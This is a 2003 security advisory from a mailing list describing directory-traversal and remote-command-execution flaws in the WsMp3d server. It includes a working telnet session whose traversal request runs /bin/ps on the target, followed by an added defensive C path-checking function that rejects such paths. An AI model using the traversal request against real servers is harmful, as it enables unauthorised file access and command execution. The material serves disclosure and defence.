[UNIX] WsMP3d Directory Traversing Vulnerability

From: SecuriTeam (support_at_securiteam.com)
Date: 05/21/03

    To: list@securiteam.com
    Date: 21 May 2003 18:46:33 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

      WsMP3d Directory Traversing Vulnerability
    ------------------------------------------------------------------------

    SUMMARY

    WsMp3d <http://wsmp3.sourceforge.net> is a "web server which also acts as
    a ShoutCast-server". Two vulnerabilities in the product allow remote
    attackers to access files that reside outside the bound HTML directory.
    This would in turn allow execution of arbitrary commands and viewing of
    arbitrary files.

    DETAILS

    Directory traversing vulnerability:
    By issuing the following request:
    http://wsmp3.server.com/cmd:ls

    A directory listing is returned. By requesting directories that reside
    outside the bounding HTML root directory, it is possible to access
    arbitrary files.

    Remote command execution:
    By accessing binary files, for example /bin/ps, it is possible to cause
    them to execute (instead of being viewed).

    Example:
    bash$ telnet wsmp3.server.com 8000
    Trying 61.37.xxx.xx...
    Connected to 61.37.xxx.xx.
    Escape character is '^]'.
    POST /dir/../../../../../../bin/ps HTTP/1.0
    HTTP/1.1 200 OK
    Connection: close
    Content-Type: text/html
    Date: Sat May 03 01:25:28 2003
    Last-Modified: Sat May 03 01:25:28 2003
    Content-Length: 201

      PID TTY TIME CMD
    29529 pts/2 00:00:00 login
    29559 pts/2 00:00:00 su
    29560 pts/2 00:00:00 bash
    29681 pts/2 00:00:10 WsMp3
    29730 pts/2 00:00:00 WsMp3
    29731 pts/2 00:00:00 ps
    Connection closed by foreign host.
    bash$
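
Added example, not part of the advisory or of WsMp3d's code: a lexical path check in C (the name normalize_request_path is hypothetical) that refuses the traversal request shown in the session above before any file is opened. It assumes the path has already been URL-decoded, and it does not resolve symlinks, which a real server would additionally check with realpath().

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical helper, not WsMp3d code. Lexically normalises an already
 * URL-decoded request path; writes a root-relative path (no leading '/')
 * to out and returns 0, or returns -1 if a ".." segment would climb above
 * the document root, a backslash appears, or out is too small. */
int normalize_request_path(const char *req, char *out, size_t outlen)
{
    size_t len = 0;                          /* bytes used in out */
    const char *p = req;

    if (outlen == 0) return -1;
    out[0] = '\0';
    for (;;) {
        while (*p == '/') p++;               /* skip empty segments */
        size_t n = strcspn(p, "/");          /* length of next segment */
        if (n == 0) return 0;                /* end of path */
        if (memchr(p, '\\', n)) return -1;   /* no alternate separators */
        if (n == 2 && p[0] == '.' && p[1] == '.') {
            if (len == 0) return -1;         /* would leave the root */
            while (len > 0 && out[len - 1] != '/') len--;  /* drop segment */
            if (len > 0) len--;              /* and its separator */
        } else if (!(n == 1 && p[0] == '.')) {   /* "." is a no-op */
            if (len + n + 2 > outlen) return -1; /* separator + NUL */
            if (len) out[len++] = '/';
            memcpy(out + len, p, n);
            len += n;
        }
        out[len] = '\0';
        p += n;
    }
}

/* Constructed sample requests; the first is the path from the advisory. */
int main(void)
{
    const char *reqs[] = { "/dir/../../../../../../bin/ps",
                           "/music/./live/../track.mp3", "/../etc/passwd" };
    char buf[256];
    for (size_t i = 0; i < sizeof reqs / sizeof reqs[0]; i++) {
        int rc = normalize_request_path(reqs[i], buf, sizeof buf);
        printf("%-32s -> %s\n", reqs[i], rc ? "REJECT" : buf);
    }
    return 0;
}
```

A server would join the accepted result to its document root, open it read-only and send the bytes. Nothing derived from the request is handed to exec or a shell, which addresses the second issue described under "Remote command execution".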

    ADDITIONAL INFORMATION

    The information has been provided by dong-h0un U.
    <xploit@hackermail.com>



